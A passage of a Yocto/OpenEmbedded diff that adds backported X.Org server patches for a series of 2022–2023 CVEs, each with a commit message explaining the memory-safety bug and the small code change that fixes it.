+- [table_apps addObjectsFromArray:apps];
++
++ if (apps != nil) {
++ for (NSArray <NSString *> * row in apps) {
++ [table_apps addObject:row.mutableCopy];
++ }
++ }
+
+ columns = [apps_table tableColumns];
+ [[columns objectAtIndex:0] setIdentifier:@"0"];
+--
+2.17.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch
new file mode 100644
index 0000000000..3f6b68fea8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch
@@ -0,0 +1,39 @@
+From ccdd431cd8f1cabae9d744f0514b6533c438908c Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 5 Dec 2022 15:55:54 +1000
+Subject: [PATCH] xkb: reset the radio_groups pointer to NULL after freeing it
+
+Unlike other elements of the keymap, this pointer was freed but not
+reset. On a subsequent XkbGetKbdByName request, the server may access
+already freed memory.
+
+CVE-2022-4283, ZDI-CAN-19530
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/ccdd431cd8f1cabae9d744f0514b6533c438908c]
+CVE: CVE-2022-4283
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ xkb/xkbUtils.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/xkb/xkbUtils.c b/xkb/xkbUtils.c
+index 8975ade..9bc51fc 100644
+--- a/xkb/xkbUtils.c
++++ b/xkb/xkbUtils.c
+@@ -1327,6 +1327,7 @@ _XkbCopyNames(XkbDescPtr src, XkbDescPtr dst)
+ }
+ else {
+ free(dst->names->radio_groups);
++ dst->names->radio_groups = NULL;
+ }
+ dst->names->num_rg = src->names->num_rg;
+
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch
new file mode 100644
index 0000000000..a6c97485cd
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch
@@ -0,0 +1,55 @@
+From b320ca0ffe4c0c872eeb3a93d9bde21f765c7c63 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 12:55:45 +1000
+Subject: [PATCH] Xtest: disallow GenericEvents in XTestSwapFakeInput
+
+XTestSwapFakeInput assumes all events in this request are
+sizeof(xEvent) and iterates through these in 32-byte increments.
+However, a GenericEvent may be of arbitrary length longer than 32 bytes,
+so any GenericEvent in this list would result in subsequent events being
+misparsed.
+
+Additionally, the swapped event is written into a stack-allocated struct
+xEvent (size 32 bytes). For any GenericEvent longer than 32 bytes,
+swapping the event may thus smash the stack like an avocado on toast.
+
+Catch this case early and return BadValue for any GenericEvent.
+Which is what would happen in unswapped setups anyway since XTest
+doesn't support GenericEvent.
+
+CVE-2022-46340, ZDI-CAN 19265
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/b320ca0ffe4c0c872eeb3a93d9bde21f765c7c63]
+CVE: CVE-2022-46340
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/xtest.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/Xext/xtest.c b/Xext/xtest.c
+index 38b8012..bf11789 100644
+--- a/Xext/xtest.c
++++ b/Xext/xtest.c
+@@ -501,10 +501,11 @@ XTestSwapFakeInput(ClientPtr client, xReq * req)
+
+ nev = ((req->length << 2) - sizeof(xReq)) / sizeof(xEvent);
+ for (ev = (xEvent *) &req[1]; --nev >= 0; ev++) {
++        int evtype = ev->u.u.type & 0177;
+ /* Swap event */
+- proc = EventSwapVector[ev->u.u.type & 0177];
++ proc = EventSwapVector[evtype];
+ /* no swapping proc; invalid event type? */
+- if (!proc || proc == NotImplemented) {
++ if (!proc || proc == NotImplemented || evtype == GenericEvent) {
+ client->errorValue = ev->u.u.type;
+ return BadValue;
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch
new file mode 100644
index 0000000000..0ef6e5fc9f
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch
@@ -0,0 +1,86 @@
+From 51eb63b0ee1509c6c6b8922b0e4aa037faa6f78b Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 13:55:32 +1000
+Subject: [PATCH] Xi: disallow passive grabs with a detail > 255
+
+The XKB protocol effectively prevents us from ever using keycodes above
+255. For buttons it's theoretically possible but realistically too niche
+to worry about. For all other passive grabs, the detail must be zero
+anyway.
+
+This fixes an OOB write:
+
+ProcXIPassiveUngrabDevice() calls DeletePassiveGrabFromList with a
+temporary grab struct which contains tempGrab->detail.exact = stuff->detail.
+For matching existing grabs, DeleteDetailFromMask is called with the
+stuff->detail value. This function creates a new mask with the one bit
+representing stuff->detail cleared.
+
+However, the array size for the new mask is 8 * sizeof(CARD32) bits,
+thus any detail above 255 results in an OOB array write.
+
+CVE-2022-46341, ZDI-CAN 19381
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/51eb63b0ee1509c6c6b8922b0e4aa037faa6f78b]
+CVE: CVE-2022-46341
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xi/xipassivegrab.c | 22 ++++++++++++++--------
+ 1 file changed, 14 insertions(+), 8 deletions(-)
+
+diff --git a/Xi/xipassivegrab.c b/Xi/xipassivegrab.c
+index d30f51f..89a5910 100644
+--- a/Xi/xipassivegrab.c
++++ b/Xi/xipassivegrab.c
+@@ -133,6 +133,12 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ return BadValue;
+ }
+
++ /* XI2 allows 32-bit keycodes but thanks to XKB we can never
++ * implement this. Just return an error for all keycodes that
++ * cannot work anyway, same for buttons > 255. */
++ if (stuff->detail > 255)
++ return XIAlreadyGrabbed;
++
+ if (XICheckInvalidMaskBits(client, (unsigned char *) &stuff[1],
+ stuff->mask_len * 4) != Success)
+ return BadValue;
+@@ -203,14 +209,8 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ &param, XI2, &mask);
+ break;
+ case XIGrabtypeKeycode:
+- /* XI2 allows 32-bit keycodes but thanks to XKB we can never
+- * implement this. Just return an error for all keycodes that
+- * cannot work anyway */
+- if (stuff->detail > 255)
+- status = XIAlreadyGrabbed;
+- else
+- status = GrabKey(client, dev, mod_dev, stuff->detail,
+- &param, XI2, &mask);
++ status = GrabKey(client, dev, mod_dev, stuff->detail,
++ &param, XI2, &mask);
+ break;
+ case XIGrabtypeEnter:
+ case XIGrabtypeFocusIn:
+@@ -319,6 +319,12 @@ ProcXIPassiveUngrabDevice(ClientPtr client)
+ return BadValue;
+ }
+
++ /* We don't allow passive grabs for details > 255 anyway */
++ if (stuff->detail > 255) {
++ client->errorValue = stuff->detail;
++ return BadValue;
++ }
++
+ rc = dixLookupWindow(&win, stuff->grab_window, client, DixSetAttrAccess);
+ if (rc != Success)
+ return rc;
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch
new file mode 100644
index 0000000000..23fef3f321
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch
@@ -0,0 +1,78 @@
+From b79f32b57cc0c1186b2899bce7cf89f7b325161b Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 30 Nov 2022 11:20:40 +1000
+Subject: [PATCH] Xext: free the XvRTVideoNotify when turning off from the same
+ client
+
+This fixes a use-after-free bug:
+
+When a client first calls XvdiSelectVideoNotify() on a drawable with a
+TRUE onoff argument, a struct XvVideoNotifyRec is allocated. This struct
+is added twice to the resources:
+ - as the drawable's XvRTVideoNotifyList. This happens only once per
+ drawable, subsequent calls append to this list.
+ - as the client's XvRTVideoNotify. This happens for every client.
+
+The struct keeps the ClientPtr around once it has been added for a
+client. The idea, presumably, is that if the client disconnects we can remove
+all structs from the drawable's list that match the client (by resetting
+the ClientPtr to NULL), but if the drawable is destroyed we can remove
+and free the whole list.
+
+However, if the same client then calls XvdiSelectVideoNotify() on the
+same drawable with a FALSE onoff argument, only the ClientPtr on the
+existing struct was set to NULL. The struct itself remained in the
+client's resources.
+
+If the drawable is now destroyed, the resource system invokes
+XvdiDestroyVideoNotifyList which frees the whole list for this drawable
+- including our struct. This function however does not free the resource
+for the client since our ClientPtr is NULL.
+
+Later, when the client is destroyed and the resource system invokes
+XvdiDestroyVideoNotify, we unconditionally set the ClientPtr to NULL. On
+a struct that has been freed previously. This is generally frowned upon.
+
+Fix this by calling FreeResource() on the second call instead of merely
+setting the ClientPtr to NULL. This removes the struct from the client
+resources (but not from the list), ensuring that it won't be accessed
+again when the client quits.
+
+Note that the assignment tpn->client = NULL; is superfluous since the
+XvdiDestroyVideoNotify function will do this anyway. But it's left for
+clarity and to match a similar invocation in XvdiSelectPortNotify.
+
+CVE-2022-46342, ZDI-CAN 19400
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/b79f32b57cc0c1186b2899bce7cf89f7b325161b]
+CVE: CVE-2022-46342
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/xvmain.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/Xext/xvmain.c b/Xext/xvmain.c
+index c520c7d..5f4c174 100644
+--- a/Xext/xvmain.c
++++ b/Xext/xvmain.c
+@@ -811,8 +811,10 @@ XvdiSelectVideoNotify(ClientPtr client, DrawablePtr pDraw, BOOL onoff)
+ tpn = pn;
+ while (tpn) {
+ if (tpn->client == client) {
+- if (!onoff)
++ if (!onoff) {
+ tpn->client = NULL;
++ FreeResource(tpn->id, XvRTVideoNotify);
++ }
+ return Success;
+ }
+ if (!tpn->client)
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch
new file mode 100644
index 0000000000..838f7d3726
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch
@@ -0,0 +1,51 @@
+From 842ca3ccef100ce010d1d8f5f6d6cc1915055900 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 14:53:07 +1000
+Subject: [PATCH] Xext: free the screen saver resource when replacing it
+
+This fixes a use-after-free bug:
+
+When a client first calls ScreenSaverSetAttributes(), a struct
+ScreenSaverAttrRec is allocated and added to the client's
+resources.
+
+When the same client calls ScreenSaverSetAttributes() again, a new
+struct ScreenSaverAttrRec is allocated, replacing the old struct. The
+old struct was freed but not removed from the client's resources.
+
+Later, when the client is destroyed the resource system invokes
+ScreenSaverFreeAttr and attempts to clean up the already freed struct.
+
+Fix this by letting the resource system free the old attrs instead.
+
+CVE-2022-46343, ZDI-CAN 19404
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/842ca3ccef100ce010d1d8f5f6d6cc1915055900]
+CVE: CVE-2022-46343
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/saver.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Xext/saver.c b/Xext/saver.c
+index c23907d..05b9ca3 100644
+--- a/Xext/saver.c
++++ b/Xext/saver.c
+@@ -1051,7 +1051,7 @@ ScreenSaverSetAttributes(ClientPtr client)
+ pVlist++;
+ }
+ if (pPriv->attr)
+- FreeScreenAttr(pPriv->attr);
++ FreeResource(pPriv->attr->resource, AttrType);
+ pPriv->attr = pAttr;
+ pAttr->resource = FakeClientID(client->index);
+ if (!AddResource(pAttr->resource, AttrType, (void *) pAttr))
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch
new file mode 100644
index 0000000000..e25afa0d16
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch
@@ -0,0 +1,75 @@
+From 8f454b793e1f13c99872c15f0eed1d7f3b823fe8 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 13:26:57 +1000
+Subject: [PATCH] Xi: avoid integer truncation in length check of
+ ProcXIChangeProperty
+
+This fixes an OOB read and the resulting information disclosure.
+
+Length calculation for the request was clipped to a 32-bit integer. With
+the correct stuff->num_items value the expected request size was
+truncated, passing the REQUEST_FIXED_SIZE check.
+
+The server then proceeded with reading at least stuff->num_items bytes
+(depending on stuff->format) from the request and stuffing whatever it
+finds into the property. In the process it would also allocate at least
+stuff->num_items bytes, i.e. 4GB.
+
+The same bug exists in ProcChangeProperty and ProcXChangeDeviceProperty,
+so let's fix that too.
+
+CVE-2022-46344, ZDI-CAN 19405
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/8f454b793e1f13c99872c15f0eed1d7f3b823fe8]
+CVE: CVE-2022-46344
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xi/xiproperty.c | 4 ++--
+ dix/property.c | 3 ++-
+ 2 files changed, 4 insertions(+), 3 deletions(-)
+
+diff --git a/Xi/xiproperty.c b/Xi/xiproperty.c
+index 6ec419e..0cfa6e3 100644
+--- a/Xi/xiproperty.c
++++ b/Xi/xiproperty.c
+@@ -890,7 +890,7 @@ ProcXChangeDeviceProperty(ClientPtr client)
+ REQUEST(xChangeDevicePropertyReq);
+ DeviceIntPtr dev;
+ unsigned long len;
+- int totalSize;
++ uint64_t totalSize;
+ int rc;
+
+ REQUEST_AT_LEAST_SIZE(xChangeDevicePropertyReq);
+@@ -1128,7 +1128,7 @@ ProcXIChangeProperty(ClientPtr client)
+ {
+ int rc;
+ DeviceIntPtr dev;
+- int totalSize;
++ uint64_t totalSize;
+ unsigned long len;
+
+ REQUEST(xXIChangePropertyReq);
+diff --git a/dix/property.c b/dix/property.c
+index ff1d669..6fdb74a 100644
+--- a/dix/property.c
++++ b/dix/property.c
+@@ -205,7 +205,8 @@ ProcChangeProperty(ClientPtr client)
+ WindowPtr pWin;
+ char format, mode;
+ unsigned long len;
+- int sizeInBytes, totalSize, err;
++ int sizeInBytes, err;
++ uint64_t totalSize;
+
+ REQUEST(xChangePropertyReq);
+
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch
new file mode 100644
index 0000000000..ef2ee5d55e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch
@@ -0,0 +1,38 @@
+From 0ba6d8c37071131a49790243cdac55392ecf71ec Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 25 Jan 2023 11:41:40 +1000
+Subject: [PATCH] Xi: fix potential use-after-free in DeepCopyPointerClasses
+
+CVE-2023-0494, ZDI-CAN-19596
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/0ba6d8c37071131a49790243cdac55392ecf71ec]
+CVE: CVE-2023-0494
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index 217baa9561..dcd4efb3bc 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -619,8 +619,10 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+ memcpy(to->button->xkb_acts, from->button->xkb_acts,
+ sizeof(XkbAction));
+ }
+- else
++ else {
+ free(to->button->xkb_acts);
++ to->button->xkb_acts = NULL;
++ }
+
+ memcpy(to->button->labels, from->button->labels,
+ from->button->numButtons * sizeof(Atom));
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch
new file mode 100644
index 0000000000..51d0e0cab6
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch
@@ -0,0 +1,46 @@
+From 26ef545b3502f61ca722a7a3373507e88ef64110 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Mon, 13 Mar 2023 11:08:47 +0100
+Subject: [PATCH] composite: Fix use-after-free of the COW
+
+ZDI-CAN-19866/CVE-2023-1393
+
+If a client explicitly destroys the compositor overlay window (aka COW),
+we would leave a dangling pointer to that window in the CompScreen
+structure, which will trigger a use-after-free later.
+
+Make sure to clear the CompScreen pointer to the COW when the latter gets
+destroyed explicitly by the client.
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Reviewed-by: Adam Jackson <ajax@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/26ef545b3502f61ca722a7a3373507e88ef64110]
+CVE: CVE-2023-1393
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ composite/compwindow.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/composite/compwindow.c b/composite/compwindow.c
+index 4e2494b86b..b30da589e9 100644
+--- a/composite/compwindow.c
++++ b/composite/compwindow.c
+@@ -620,6 +620,11 @@ compDestroyWindow(WindowPtr pWin)
+ ret = (*pScreen->DestroyWindow) (pWin);
+ cs->DestroyWindow = pScreen->DestroyWindow;
+ pScreen->DestroyWindow = compDestroyWindow;
++
++ /* Did we just destroy the overlay window? */
++ if (pWin == cs->pOverlayWin)
++ cs->pOverlayWin = NULL;
++
+ /* compCheckTree (pWin->drawable.pScreen); can't check -- tree isn't good*/
+ return ret;
+ }
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch
new file mode 100644
index 0000000000..508588481e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch
@@ -0,0 +1,84 @@
+From 541ab2ecd41d4d8689e71855d93e492bc554719a Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 3 Oct 2023 11:53:05 +1000
+Subject: [PATCH] Xi/randr: fix handling of PropModeAppend/Prepend
+
+The handling of appending/prepending properties was incorrect, with at
+least two bugs: the property length was set to the length of the new
+part only, i.e. appending or prepending N elements to a property with P
+existing elements always resulted in the property having N elements
+instead of N + P.
+
+Second, when pre-pending a value to a property, the offset for the old
+values was incorrect, leaving the new property with potentially
+uninitalized values and/or resulting in OOB memory writes.
+For example, prepending a 3 element value to a 5 element property would
+result in this 8 value array:
+ [N, N, N, ?, ?, P, P, P ] P, P
+ ^OOB write
+
+The XI2 code is a copy/paste of the RandR code, so the bug exists in
+both.
+
+CVE-2023-5367, ZDI-CAN-22153
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/541ab2ecd41d4d8689e71855d93e492bc554719a]
+CVE: CVE-2023-5367
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xiproperty.c | 4 ++--
+ randr/rrproperty.c | 4 ++--
+ 2 files changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/Xi/xiproperty.c b/Xi/xiproperty.c
+index 066ba21fba..d315f04d0e 100644
+--- a/Xi/xiproperty.c
++++ b/Xi/xiproperty.c
+@@ -730,7 +730,7 @@ XIChangeDeviceProperty(DeviceIntPtr dev, Atom property, Atom type,
+ XIDestroyDeviceProperty(prop);
+ return BadAlloc;
+ }
+- new_value.size = len;
++ new_value.size = total_len;
+ new_value.type = type;
+ new_value.format = format;
+
+@@ -747,7 +747,7 @@ XIChangeDeviceProperty(DeviceIntPtr dev, Atom property, Atom type,
+ case PropModePrepend:
+ new_data = new_value.data;
+ old_data = (void *) (((char *) new_value.data) +
+- (prop_value->size * size_in_bytes));
++ (len * size_in_bytes));
+ break;
+ }
+ if (new_data)
+diff --git a/randr/rrproperty.c b/randr/rrproperty.c
+index c2fb9585c6..25469f57b2 100644
+--- a/randr/rrproperty.c
++++ b/randr/rrproperty.c
+@@ -209,7 +209,7 @@ RRChangeOutputProperty(RROutputPtr output, Atom property, Atom type,
+ RRDestroyOutputProperty(prop);
+ return BadAlloc;
+ }
+- new_value.size = len;
++ new_value.size = total_len;
+ new_value.type = type;
+ new_value.format = format;
+
+@@ -226,7 +226,7 @@ RRChangeOutputProperty(RROutputPtr output, Atom property, Atom type,
+ case PropModePrepend:
+ new_data = new_value.data;
+ old_data = (void *) (((char *) new_value.data) +
+- (prop_value->size * size_in_bytes));
++ (len * size_in_bytes));
+ break;
+ }
+ if (new_data)
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch
new file mode 100644
index 0000000000..720340d83b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch
@@ -0,0 +1,102 @@
+From 564ccf2ce9616620456102727acb8b0256b7bbd7 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 5 Oct 2023 12:19:45 +1000
+Subject: [PATCH] mi: reset the PointerWindows reference on screen switch
+
+PointerWindows[] keeps a reference to the last window our sprite
+entered - changes are usually handled by CheckMotion().
+
+If we switch between screens via XWarpPointer our
+dev->spriteInfo->sprite->win is set to the new screen's root window.
+If there's another window at the cursor location CheckMotion() will
+trigger the right enter/leave events later. If there is not, it skips
+that process and we never trigger LeaveWindow() - PointerWindows[] for
+the device still refers to the previous window.
+
+If that window is destroyed we have a dangling reference that will
+eventually cause a use-after-free bug when checking the window hierarchy
+later.
+
+To trigger this, we require:
+- two protocol screens
+- XWarpPointer to the other screen's root window
+- XDestroyWindow before entering any other window
+
+This is a niche bug so we hack around it by making sure we reset the
+PointerWindows[] entry so we cannot have a dangling pointer. This
+doesn't handle Enter/Leave events correctly but the previous code didn't
+either.
+
+CVE-2023-5380, ZDI-CAN-21608
+
+This vulnerability was discovered by:
+Sri working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Reviewed-by: Adam Jackson <ajax@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/564ccf2ce9616620456102727acb8b0256b7bbd7]
+CVE: CVE-2023-5380
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.h | 2 --
+ include/eventstr.h | 3 +++
+ mi/mipointer.c | 17 +++++++++++++++--
+ 3 files changed, 18 insertions(+), 4 deletions(-)
+
+diff --git a/dix/enterleave.h b/dix/enterleave.h
+index 4b833d8..e8af924 100644
+--- a/dix/enterleave.h
++++ b/dix/enterleave.h
+@@ -58,8 +58,6 @@ extern void DeviceFocusEvent(DeviceIntPtr dev,
+
+ extern void EnterWindow(DeviceIntPtr dev, WindowPtr win, int mode);
+
+-extern void LeaveWindow(DeviceIntPtr dev);
+-
+ extern void CoreFocusEvent(DeviceIntPtr kbd,
+ int type, int mode, int detail, WindowPtr pWin);
+
+diff --git a/include/eventstr.h b/include/eventstr.h
+index bf3b95f..2bae3b0 100644
+--- a/include/eventstr.h
++++ b/include/eventstr.h
+@@ -296,4 +296,7 @@ union _InternalEvent {
+ #endif
+ };
+
++extern void
++LeaveWindow(DeviceIntPtr dev);
++
+ #endif
+diff --git a/mi/mipointer.c b/mi/mipointer.c
+index 75be1ae..b12ae9b 100644
+--- a/mi/mipointer.c
++++ b/mi/mipointer.c
+@@ -397,8 +397,21 @@ miPointerWarpCursor(DeviceIntPtr pDev, ScreenPtr pScreen, int x, int y)
+ #ifdef PANORAMIX
+ && noPanoramiXExtension
+ #endif
+- )
+- UpdateSpriteForScreen(pDev, pScreen);
++ ) {
++ DeviceIntPtr master = GetMaster(pDev, MASTER_POINTER);
++ /* Hack for CVE-2023-5380: if we're moving
++ * screens PointerWindows[] keeps referring to the
++ * old window. If that gets destroyed we have a UAF
++ * bug later. Only happens when jumping from a window
++ * to the root window on the other screen.
++ * Enter/Leave events are incorrect for that case but
++ * too niche to fix.
++ */
++ LeaveWindow(pDev);
++ if (master)
++ LeaveWindow(master);
++ UpdateSpriteForScreen(pDev, pScreen);
++ }
+ }
+
+ /**
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch
new file mode 100644
index 0000000000..0abd5914fa
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch
@@ -0,0 +1,79 @@
+From 0c1a93d319558fe3ab2d94f51d174b4f93810afd Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 28 Nov 2023 15:19:04 +1000
+Subject: [PATCH] Xi: allocate enough XkbActions for our buttons
+
+button->xkb_acts is supposed to be an array sufficiently large for all
+our buttons, not just a single XkbActions struct. Allocating
+insufficient memory here means when we memcpy() later in
+XkbSetDeviceInfo we write into memory that wasn't ours to begin with,
+leading to the usual security ooopsiedaisies.
+
+CVE-2023-6377, ZDI-CAN-22412, ZDI-CAN-22413
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/0c1a93d319558fe3ab2d94f51d174b4f93810afd]
+CVE: CVE-2023-6377
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 12 ++++++------
+ dix/devices.c | 10 ++++++++++
+ 2 files changed, 16 insertions(+), 6 deletions(-)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index dcd4efb3bc..54ea11a938 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -611,13 +611,13 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+ }
+
+ if (from->button->xkb_acts) {
+- if (!to->button->xkb_acts) {
+- to->button->xkb_acts = calloc(1, sizeof(XkbAction));
+- if (!to->button->xkb_acts)
+- FatalError("[Xi] not enough memory for xkb_acts.\n");
+- }
++ size_t maxbuttons = max(to->button->numButtons, from->button->numButtons);
++ to->button->xkb_acts = xnfreallocarray(to->button->xkb_acts,
++ maxbuttons,
++ sizeof(XkbAction));
++ memset(to->button->xkb_acts, 0, maxbuttons * sizeof(XkbAction));
+ memcpy(to->button->xkb_acts, from->button->xkb_acts,
+- sizeof(XkbAction));
++ from->button->numButtons * sizeof(XkbAction));
+ }
+ else {
+ free(to->button->xkb_acts);
+diff --git a/dix/devices.c b/dix/devices.c
+index b063128df0..3f3224d626 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -2539,6 +2539,8 @@ RecalculateMasterButtons(DeviceIntPtr slave)
+
+ if (master->button && master->button->numButtons != maxbuttons) {
+ int i;
++ int last_num_buttons = master->button->numButtons;
++
